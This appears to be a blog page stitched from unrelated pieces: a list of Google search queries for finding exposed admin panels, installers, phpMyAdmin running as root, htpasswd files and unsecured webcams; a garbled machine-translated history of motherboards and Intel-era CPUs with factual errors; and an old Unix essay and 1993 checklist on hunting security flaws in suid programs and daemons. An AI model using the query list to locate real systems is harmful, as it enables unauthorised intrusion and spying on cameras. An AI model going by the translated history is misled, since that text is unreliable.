ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages
"ftp://" "www.eastgame.net"
"html allowed" guestbook
"
: vBulletin Version 1.1.5"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:"index.php" "site=sglinks"
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
inurl:"/NSearch/AdminServlet"
inurl:"index.php? module=ew_filemanager"
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:"t="
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp
+ View Webcam User Accessing
allinurl:control/multiview
inurl:"ViewerFrame?Mode="
intitle:"WJ-NT104 Main Page"
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"

HIstory of Motherboard

Motherboard (printed circuit board or PCB) is a board full of metal from the circuit that connects electronic components with each other without cables.

Circuit board to get this name because it is produced in bulk with the printing.

history
* 1936 - printed circuit board was first found by Paul Eisler, Austrian scientists who enter the circuit board into a radio.
* 1943 - United States use circuit board with a large number of them in military radio.
* 1948 - commercialization printed circuit boards in the United States.

After 1950, printed circuit boards have been used massively in the electronic industry.

Classification

Printed circuit boards can be classified based on several types:
layer stack
Single layer
Double layer
Multi-layer (4, 6, 8 ply)
shape
Hard
Soft (flexible)
A combination of hard and soft
specification
Conventional
the high density (High Density Interconnect)
material base
FR4
Metal
Ceramics

http://www.kotagaul.com/forumdisplay.php?s=9b97a0a9f96fd452ba4ca1d79ccd3bd4&f=89

Specifications
Motherbord mainboard alias alias system board, refer to the third one the same, ie, a circuit board and panel-panel electronic menggerakan overall PC system. In principle, a motherboard is made up of some parts of the system CPU (processor), circuit clock / timing, Ram, Cache, ROM BIOS, I / O ports such as serial ports, parallel ports, expansion slots, IDE Prot.

That need to be!
Particularly, at least there are 7 things that must be on a motherboard. The seven components are:

* Chipset
* CPU Type
* Slot type and memory
* Cache memory
* System BIOS
* Slot expansion
* I / O Port

Indeed, here's a problem on the system or PC can be detected. Damage outside the 7 components are rare. The possibility that others, when the seven components to this wrong-wrong course, suspected that the problem should be located on the motherboard architecture itself, either circuit-sirkuitnya, or components dipergunakannya.

Chipset: commander of data and process
Chipset called this one because the goods are generally a pair of chip that control the processor and the features of the hardware mortherboard thoroughly. A pair of chips, which one called the North Bright chip and one called the South Bridge chip, can be spelled out is the commander-in-chief in a system called motherboard.Saat this, there are a lot of motherboards with chipsets different. Type chipset used on the motherboard will determine, among other things.

* Mobile processor can be used
* Type of memory that can support a PC system and its maximum capacity
* Kelengkapan I / O is able to provide
* Type of display adapter that can be used
* The width of the data that can be supported motgherboarad
* Availability of additional features (such as LAN, sound card, modem or onboard).

CPU Type
There are three types of CPU that many circulating in the market that Intel Corporation CPU output, output AMD Advanced Micro Devices, Cyrix and VIA C3 or output VIA Technologies Corporation. CPU alias output VIA processor itself, in general, the technology platform provided by Intel. That is, each series released VIA processor, in general, has always compatibility with the series of Intel processors made. Meanwhile, AMD uses a platform technology that is different from that used by Intel, although pross technology used by this company also follow what the Intel. Because the difference this platform, using the AMD processor socket or slot that is different from that used by Intel. When you mention Intel Slot 1, AMD call Slot A. on the processor socket, AMD later relative mengeluarakan more consistent in the type of connector is used, ie, always use a compatible connector on the speed of any series, that is, the connector pins with the number of 462 units. Compare with Intel, which is always change, of the 370 pin socket, and a 423 pin, then changed again to be 478. consequently, it is possible to upgrade to a new generation of Intel processors always be at the same time with the replacement of the motherboard itself. Here are a few historical development of the processor and the Intel clone its successful disarikan

Technology is the oldest to the newest
Starting with the debut Intel processor series MCS4 which is the embryo of the processor's i4040. 4-bit processor is planned to be the brain calculator, in the same year (1971), Intel i440 to make revisions. Originally ordered by a Japanese company for the calculator, the processor is much more intense than expected, so Intel's purchase rights to Japanese companies for the development and further research. Here for the development of the embryo of the processor to the computer.
Next 8-bit processor appear first i8008 (1972), but slightly less preferred because multivoltage .. new processor ago appear i8080, here there is a change in voltage that is a triple, a technology NMOS (PMOS not more), and introduce the first time the system clock generator (for additional chip), packed in the form of Array DIP 40 pins. And also appear processor2: -1974 Motorola's MC6800, Z80 from Zilog -1976 (the two rival weight), and another series prosessor2 artificial MOST 6500, Rockwell, Hyundai, WDC, NCR dst. Z80 full compatible with the i8008 only until the machine language level. Level rakitannya different language (not level compatible software). I8080 processor is the processor's internal registers with the 8-bit external bus 8-bit memory addressing and 20-bit (can access 1 MB total memory), and operating mode REAL.
77 Thn appear 8085, generatornya onprocessor clock, cikal bakalnya the use of single voltage +5 V (implementation s 486DX2, DX4 start at +3.3 V ff).
i8086, register with the processor, 16-bit external data bus, 16-bit memory addressing and 20-bit. 78 yr Direlease using HMOS technology, components that support 16-bit bus is very rare, so the price becomes very expensive.
But demand for the market appears i8088 16bit internal bus, 8bit external bus. I8088, so the components can be used 8bit peripherals i8008. IBM chose to chip pebuatan IBM PC because it is cheaper than the i8086. If only the CEO of IBM says it is not just the PC side mere dream, of course, IBM will take the total PC market at this time. IBM PC first release in August 1981 has 3 versions of IBM PC, IBM PC-Jr and IBM PC-XT (extended technology). Chip i8088 is very popular, until the NEC has launched a chip that is built on the pin chip specification, which is named V20 and V30. NEC V20 and V30 processor that is compatible with Intel until the assembly level language (software).
Chip 8088 and 8086 fully compatible with the program that made the chip for 8080, although there may be some programs made for the 8086 chip does not work with 8088 (the difference between bus width)

Then, 80186 and i80188 appear .. since i80186, start processor packed in the form of a PLCC, LCC PGA and 68 feet .. i80186 physical shape with 17 foot squares persisi (PLCC / LCC) or 2 feet persisi array (PGA) and this is the start of the i80186 chip DMA and interrupt controller incorporated into the processor. ever since the 286, the computer uses the term IBM IBM PC-AT (Advanced Technology) and began to use the term PersonalSystem (PS / 1). And also started the use of 16 bit ISA slot which is developed from the 8-bit ISA slot, the crowd began to appear cloner. It's AMD, Harris & MOS that fully compatible with Intel. This began in 286, known use of Protected Virtual Address Mode that allows multitasking of the time sharing (via hardware resetting).
IBM 86 years to make RISC processor architecture with 32bit for the first-class PC. But as the scarcity of software, IBM RT PC is "sluggish" for enterprise-class, RISC is growing more rapidly, at least, there are many vendors that are not compatible each other.

Then, to reach the lost momentum of the i8086 chip, Intel i80286 create, register with the processor, 16-bit external bus, 16-bit protected mode, known as limited STANDARD mode using the memory 24-bit addressing that is able to access up to 16 MB of memory. 80286 chip is of course fully compatible with the chip-chip 808x series previously, with some additional new set of instructions. Unfortunately, this chip has a few bugs in the design of its hardware, so it failed to collect cohort.
In 1985, Intel launched a processor design that is new: i80386. A 32-bit processor, meaning that the register has a 32-bit external data bus 32-bit, and maintain compatibility with previous generation processor, with the introduction of additional mode PROTECTED 32-BIT memory for 32-bit addressing, is able to access a maximum of 4 GB, and do not forget to add some new instructions. This chip is packed in the form of PGA (pin Grid Array)
Intel processors up to this point has not been a unit of the FPU
internal. Support for the FPU, Intel launched a series of 80 × 87. Since 386 began appearing cloner processor: AMD, Cyrix, NGen, IT, IIT, IBM (Blue Lightning) dst, kind-macamnya: i80386 DX (full 32 bit)
* I80386 SX (cheap because 16bit external)
I80486 * DX (int 487)
* I80486 SX (487 disabled)
* Cx486 DLC (using MB 386DX, and others)
* Cx486 SLC (using MB 386SX)
* I80486DX2
* I80486DX2 ODP
* Cx486DLC2 (architecture 386 MB)
* Cx486SLC2 (architecture 386 MB)
* I80486DX4
* I80486DX4 ODP
* I80486SX2
* Pentium
* Pentium ODP

Around 1989 Intel launched i80486DX. Series which are very popular, the increase of this series is a series of 80,386-speed FPU and support schemes and internal clock multiplier (i486DX2 and iDX4 series), without additional new instructions. Due to public demand for cheaper processors, Intel launched the series i80486SX that no other processor is i80486DX the FPU to its circuits have been disabled. As it should, i80486DX series have full compatibility with instruction set chip-chip series before.
AMD and Cyrix processor design and purchase i80386 and i80486DX to make Intel-compatible processors, and they are very successful. In my opinion this is a process called 'cloning', as the story of NEC V20 and V30. AMD and Cyrix does not make vertical design process (based on a previous series chip), but based on chip designs that already exist to create a chip that classmates.
1993, and Intel launched its Pentium processor. Peningkatannya against i80486: PGA structure of a larger (higher speed, and pipelining, with new instructions. There is a special chip from this, only the fact that the standard VLB made to i80486 not match (not compatible) so that the chipset forced to re-designed to support PCI. Intel Pentium using the term to "blocked" saingannya. Since the Pentium cloner start this "fall" to stay AMD, Cyrix. Intel uses the term because the Intel Pentium lose patent in court. why the number can not be patented , so removing the Intel Pentium use TM. Cyrix, AMD does not want to fall behind, they issued a standard Pentium Rating (PR) in 92 previous intelligence had collaborated degan Sun, but failed, and Intel was charged by Sun because Sun allegedly copy the design. Since Pentium, Intel has implemented the ability Pipelining cuman usually have diprocessor RISC (RISC spt SunSparc). VESA Local Bus 32bit is the development of architecture 16bit ISA use the clock because it still has its own clock generator (usually> 33MHz) architecture, while PCI is a new architecture that speeds clocknya the processor clock speed (typically half the speed of processor speed) .. so the speed PCI VGA card will not be the same relative frequency in MHz processor in a different alias MHz processor more quickly, the sooner its PCI
In 1995, occurrence of the Pentium Pro. Innovation disatukannya cache memory to the processor socket dibuatnya claim 8. Pin-pin processor is divided 2 groups: group 1 for the cache memory, and 1 group for prosesornya own, no more than a pin-pin Pentium changed the order. This design allows the processor efficiency is higher when the handle 32-bit instructions, but if there is a 16-bit instructions appear in the cycle 32-bit instructions, the processor will make the evacuation process execution so that the cache is running low. But there are instructions added 1: CMOV (Conditional MOVE).
In 1996, Pentium MMX processor. In fact no more than a Pentium with additional units and additional set of instructions, the MMX. Intel until now still have not provided a clear definition of the term MMX. Multi Media extension is the term used AMD. There is a limitation on the design of this chip: MMX only because the module is added to the board in the draft without a Pentium stake back, Intel had to create a unit to MMX and FPU sharing, in terms of FPU at MMX active non-active, and vice versa. So MMX Pentium MMX mode in not compatible with the Pentium.
What about the AMD K5? AMD K5-PR75 is actually a 'clone' i80486DX with 133MHz speed internal bus and 33MHz clock. Specifications are Pentium AMD K5 when designing the next versions Cyrix when designing and 6 × 86 is only limited to the specification of pin-pin Pentium. They were not given access to the original design. IBM does not even able to make Intel bergeming (Cyrix, have a contract tied up with IBM in 2005) on the draft AMD K6, K6 know that your design is actually the property of NexGen? While Intel says making unit MMX, AMD MMX explore the design and add it to the K6. Unfortunately MMX specifications are not likely that AMD used Intel, the K6 has proven many ketidakkompatibilitas with the Pentium MMX instructions MMX.

1997, Intel launched Pentium II, Pentium Pro with MMX technology, which has 2 innovation: the cache memory does not become 1 with the core processor such as Pentium Pro, but is outside the core, but works with processor speed. Innovation is what causes the loss of the lack Pentium Pro (the evacuation cache) Innovation second, the SEC (Single Edge Cartidge), Why? Since we can install the Pentium Pro processor slot in the SEC with the help of a special adapter. Additional: onprocessor because of L2 cache, the cache speed processor speed, while the PII cachenya in the "outside" (using the processor module), then half the speed of the processor speed. Also mentioned the use of the PII Slot 1 for several reasons:
First, widen channels of data (foot lot - also a reason for Socket 8), and processing on PPro PII can parallel. Therefore Slot 1 actually have more strength in Multithreading / Multiple Processor. (Unfortunately O / S has not been a lot of support, dual PII processorpun benchmark by more ZDBench conducted via Win95 instead via NT) Second, the possible upgrader Slot 1 without eating a lot of space on the motherboard because if not ZIF socket 9, the area can Form Factor (MB) its own concept sparingly this space since 8088 are also available. Why SIMM specification also out in 286? some of them is efficiency and simplification of the place.

Third, the cache module allows you to use a more efficient and balanced with the high-speed processor with a speed and again without a lot of places to eat, does not like AMD / Cyrix a "forced" double L1 cachenya to compete PII speed (due to its slow-L2) so that In conclusion AMD K6 and Cyrix 6 × 86 in the processor is not fast but quick hit in the cache! For the spec Socket7 speed L2 cache will be limited only as soon as the data bus / slow when the data bus is busy, the PII is planned to operate at 100MHz (66MHz not more). Point this is one of the reasons why Intel's 430 chipset to 440 which means that must also change the motherboard.

http://asepmuhsin.wordpress.com/2007/08/19/mengenal-lebih-dekat-dengan-motherboard/

finding security holes

Security holes manifest themselves in (broadly) four ways:

1) Physical Security Holes.

- Where the potential problem is caused by giving unauthorised persons
physical access to the machine, where this might allow them to perform
things that they shouldn't be able to do.

A good example of this would be a public workstation room where it would
be trivial for a user to reboot a machine into single-user mode and muck
around with the workstation filestore, if precautions are not taken.

Another example of this is the need to restrict access to confidential
backup tapes, which may (otherwise) be read by any user with access to
the tapes and a tape drive, whether they are meant to have permission or
not.

2) Software Security Holes

- Where the problem is caused by badly written items of "privledged"
software (daemons, cronjobs) which can be compromised into doing things
which they shouldn't oughta.

The most famous example of this is the "sendmail debug" hole (see
bibliography) which would enable a cracker to bootstrap a "root" shell.
This could be used to delete your filestore, create a new account, copy
your password file, anything.

(Contrary to popular opinion, crack attacks via sendmail were not just
restricted to the infamous "Internet Worm" - any cracker could do this
by using "telnet" to port 25 on the target machine. The story behind a
similar hole (this time in the EMACS "move-mail" software) is described
in [Stoll].)

New holes like this appear all the time, and your best hopes are to:

a: try to structure your system so that as little software as possible
runs with root/daemon/bin privileges, and that which does is known to
be robust.

b: subscribe to a mailing list which can get details of problems
and/or fixes out to you as quickly as possible, and then ACT when you
receive information.

>From: Wes Morgan
>
> c: When installing/upgrading a given system, try to install/enable only
> those software packages for which you have an immediate or foreseeable
> need. Many packages include daemons or utilities which can reveal
> information to outsiders. For instance, AT&T System V Unix' accounting
> package includes acctcom(1), which will (by default) allow any user to
> review the daily accounting data for any other user. Many TCP/IP packa-
> ges automatically install/run programs such as rwhod, fingerd, and
> tftpd, all of which can present security problems.
>
> Careful system administration is the solution. Most of these programs
> are initialized/started at boot time; you may wish to modify your boot
> scripts (usually in the /etc, /etc/rc, /etc/rcX.d directories) to pre-
> vent their execution. You may wish to remove some utilities completely.
> For some utilities, a simple chmod(1) can prevent access from unauthorized
> users.
>
> In summary, DON'T TRUST INSTALLATION SCRIPTS/PROGRAMS! Such facilities
> tend to install/run everything in the package without asking you. Most
> installation documentation includes lists of "the programs included in
> this package"; be sure to review it.

3) Incompatible Usage Security Holes

- Where, through lack of experience, or no fault of his/her own, the
System Manager assembles a combination of hardware and software which
when used as a system is seriously flawed from a security point of view.
It is the incompatibility of trying to do two unconnected but useful
things which creates the security hole.

Problems like this are a pain to find once a system is set up and
running, so it is better to build your system with them in mind. It's
never too late to have a rethink, though.

Some examples are detailed below; let's not go into them here, it would
only spoil the surprise.

4) Choosing a suitable security philosophy and maintaining it.

>From: Gene Spafford
>The fourth kind of security problem is one of perception and
>understanding. Perfect software, protected hardware, and compatible
>components don't work unless you have selected an appropriate security
>policy and turned on the parts of your system that enforce it. Having
>the best password mechanism in the world is worthless if your users
>think that their login name backwards is a good password! Security is
>relative to a policy (or set of policies) and the operation of a system
>in conformance with that policy.

---

From: Hacking
Subject: Hacking Ideas
Date: 11/10/93

( Please contribute by sending E-Mail to ... )

[ Many ideas taken from: HaxNet - APG V1.3 : Guide to finding new holes]

NOTE: I think this should be divided into general categories:
1) General principles
2) Looking for holes in src (most items here)
3) Looking in binary distributions
4) Looking in site specific configurations

The following general classifications suggest themselves:
1) SUID/SGID
2) Return codes/error conditions
3) unexpected input
4) race conditions
5) authentication
6) implicit trust
7) parameters
8) permissions
9) interrupts
10) I/O
11) symbolic links
12) Daemons, particularly those taking user input.
13) Kernel race conditions
14) what else? - please add categories

(Suggested splitting of above into main and sub-catagories)
I: Suid binaries and scripts
unexpected user interactions
flawed liberary calls
implicit assumptions of external conditions (sym links, loc. paths)
race conditions
II: daemons running with priviliged uid's
race conditions
poor file protectons
implicit file protections
trust
authentication
III: Kernel problems
Kernel race conditions
device driver code

The following four step method was created by System Development
Corporation, who report a 65% success rate on the flaw hypotheses
generated. Doing a comprehensive search for operating system flaws
requires four steps:

Step 1) Knowledge of system control structure.
===============================================
To find security holes, and identifying design weaknesses it is
necessary to understand the system control structure, and layers.
One should be able to list the:
A) security objects: items to be protected. ie: a users file.
B) control objects: items that protect security objects. ie: a i-node
C) mutual objects : objects in both classes. ie: the password file
With such a list, it is possible to graphically represent a control
hierarchy and identify potential points of attack. Making flow charts
to give a visual breakdown of relationships definitely helps.
Reading the various users, operators, and administrators manuals should
provide this information.
(following para's should probably be moved to a "legal" section)
Reading and greping source code should also prove valuable. For those
without a source licence, I would suggest we use LINUX, NET2, and BSD386
distributions in order to stay legal. At some future time we may be able
to form a working contract between someone or a company with legal access
to other distributions and members actively participating in this project.
It appears that extracts of proprietary code may be used for academic
study, so long as they are not reused in a commercial product - more
checking is necessary though.

Step 2) Generate an inventory of suspected flaws. (i.e. flaw hypotheses)
========================================================================
In particular we want:
Code history:
What UNIX src does a particular flavor derive from? This is important
for cross references (very often only one vendor patches certain code,
which may get reused, in it's unpatched reincarnation by others)
A solid cross reference:
Who checked which bug in what OS and what version prevents us from
duplicating work.

A good start would be listing all the suid binaries on the various OS
flavors/versions. Then try to work out why each program is suid. i.e.:
rcp is suid root because it must use a privilaged port to do user
name authentication.
Often code that was never designed to be suid, is made suid, durring
porting to solve file access problems.
We need to develope a data base that will be able to look at pairs and
triplets of data, specificly: program name, suid, sgid, object accessed
(why prog is suid/sgid), OS flavor/version, and flav/vers geniology.
Any sugestions on how to implement such a DB?

Step 3) Confirm hypotheses. (test and exploit flaws)
====================================================

Step 4) Make generalizations of the underlying system weaknesses, for
which the flaw represents a specific instance.
=====================================================================

Tool Box:
=========
AGREP: I suggest everyone obtain, and install agrep from:
ftp cs.arizona.edu /agrep/agrep.tar.Z
Agrep supports "windowing" so it can look for routines, and subroutines.
It also supports logical operators and is thus ideally suited to automating
the search for many of the following flaws. i.e.
agrep WINDOW {suid() NOT taintperl()} /usr/local/*.pl
or agrep WINDOW {[suid() OR sgid()] AND [system() OR popen() OR execlp()
OR execvp()]} /usr/local/src/*.c

PERMUTATION PROGRAM: Another tool worth producing is a program to generate
all possible permutations of command line flags/arguments in order to uncover
undocumented features, and try to produce errors.

TCOV:

CRASH: Posted to USENET (what FTP archive?) (descrip?)

PAPERS: There are several papers that discuss methods of finding flaws, and
present test suites.
1) An Emphirical Study of the reliability of UNIX Utilities, by Barton P.
Miller, Lars Fredriksen, and Bryan So, Comm ACM, v33 n12, pp32-44,
Dec '90. Describes a test suite for testing random input strings.
Results indicated that 25% of the programs hung, crashed, or misbehaved.
In one case the OS crashed. An understanding of buffer and register
layout on the environment in question, and the expected input is likely
to produce the desired results.
2) The Mothra tools set, in Proceedings of the 22nd Hawaii International
Conference on Systems and Software, pages 275-284, Kona, HI, January '89
3) Extending Mutation Testing to Find Environmental Bugs, by Eugene H.
Spafford, Software Practice and Experience, 20(2):181-189, Feb '90
4) A paper by IBM was mentioned that was submitted to USENIX a few years
ago. (Anyone have a citation?).

Specific Flaws to Check For:
============================
1) Look for routines that don't do boundary checking, or verify input.
ie: the gets() family of routines, where it is possible to overwrite
buffer boundaries. ( sprintf()?, gets(), etc. )
also: strcpy() which is why most src has:
#define SCYPYN((a)(b)) strcpy(a, b, sizeof(a))

2) SUID/SGID routines written in one of the shells, instead of C or
PERL.

3) SUID/SGID routines written in PERL that don't use the "taintperl"
program.)

4) SUID/SGID routines that use the system(), popen(), execlp(), or
execvp() calls to run something else.

5) Any program that uses relative path names inside the program.

6) The use of relative path names to specify dynamically linked libraries.
(look in Makefile).

7) Routines that don't check error return codes from system calls. (ie:
fork(2), suid(2), etc), setuid() rather, as in the famous rcp bug

8) Holes can often be found in code that:
A) is ported to a new environment.
B) receives unexpected input.
C) interacts with other local software.
D) accesses system files like passwd, L.sys, etc.
E) reads input from a publicly writable file/directory.
F) diagnostic programs which are typically not user-proofed.

9) Test code for unexpected input. Coverage, data flow, and mutation
testing tools are available.

10) Look in man pages, and users guides for warnings against doing X, and
try variations of X. Ditto for "bugs" section.

11) Look for seldom used, or unusual functions or commands - read backwards.
In particular looking for undocumented flags/arguments may prove useful.
Check flags that were in prior releases, or in other OS versions. Check
for options that other programs might use. For instance telnet uses -h
option to login ...
right, as most login.c's I've seen have:
if((getuid()) && hflag){
syslog()
exit()
}

12) Look for race conditions.

13) Failure of software to authenticate that it is really communicating
with the desired software or hardware module it wants to be accessing.

14) Lack or error detection to reset protection mechanisms following an
error.

15) Poor implementation resulting in, for example, condition codes being
improperly tested.

16) Implicit trust: Routine B assumes routine A's parameters are correct
because routine A is a system process.

17) System stores it's data or references user parameters in the users
address space.

18) Inter process communication: return conditions (passwd OK, illegal
parameter, segment error, etc) can provide a significant wedge, esp.
when combined with (17).

19) User parameters may not be adequately checked.

20) Addresses that overlap or refer to system areas.

21) Condition code checks may be omitted.

22) Failure to anticipate unusual or extraordinary parameters.

23) Look for system levels where the modules involved were written by
different programmers, or groups of programmers - holes are likely
to be found.

24) Registers that point to the location of a parameters value instead
of passing the value itself.

25) Any program running with system privileges. (too many progs are given
uid 0, to facilitate access to certain tables, etc.)

26) Group or world readable temporary files, buffers, etc.

27) Lack of threshold values, and lack of logging/notification once these
have been triggered.

28) Changing parameters of critical system areas prior to their execution
by a concurrent process. (race conditions)

29) Inadequate boundary checking at compile time, for example, a user
may be able to execute machine code disguised as data in a data area.
(if text and data areas are shared)

30) Improperly handling user generated asynchronous interrupts. Users
interrupting a process, performing an operation, and either returning
to continue the process or begin another will frequently leave the
system in an unprotected state. Partially written files are left open,
improper writing of protection infraction messages, improper setting
of protection bits, etc often occur.

31) Code that uses fopen(3) without setting the umask. ( eg: at(1), etc. )
In general, code that does not reset the real and effective uid before
forking.

32) Trace is your friend (or truss in SVR4) for helping figure out what
system calls a program is using.

33) Scan /usr/local fs's closely. Many admins will install software from
the net. Often you'll find tcpdump, top, nfswatch, ... suid'd root for
their ease of use.

34) Check suid programs to see if they are the ones originally put on the
system. Admins will sometimes put in a passwd replacement which is less
secure than the distributed version.

35) Look for programs that were there to install software or loadable
kernel modules.

36) Dynamically linked programs in general. Remember LD_PRELOAD, I think
that was the variable.

37) I/O channel programming is a prime target. Look for logical errors,
inconsistencies, and omissions.

38) See if it's possible for a I/O channel program to modify itself, loop
back, and then execute the newly modified code. (instruction pre-load
may screw this up)

39) If I/O channels act as independent processors they may have unlimited
access to memory, thus system code may be modified in memory prior to
execution.

40) Look for bugs requiring flaws in multiple pieces of software, i.e. say
program a can be used to change config file /etc/a now program b assumes
the information in a to be correct and this leads to unexpected results
(just look at how many programs trust /etc/utmp)

41) Any program, especially those suid/sgid, that allow shell escapes.

Langgan: Entri (Atom)

© Blogger template Columnus by Ourblogtemplates.com 2008

Back to TOP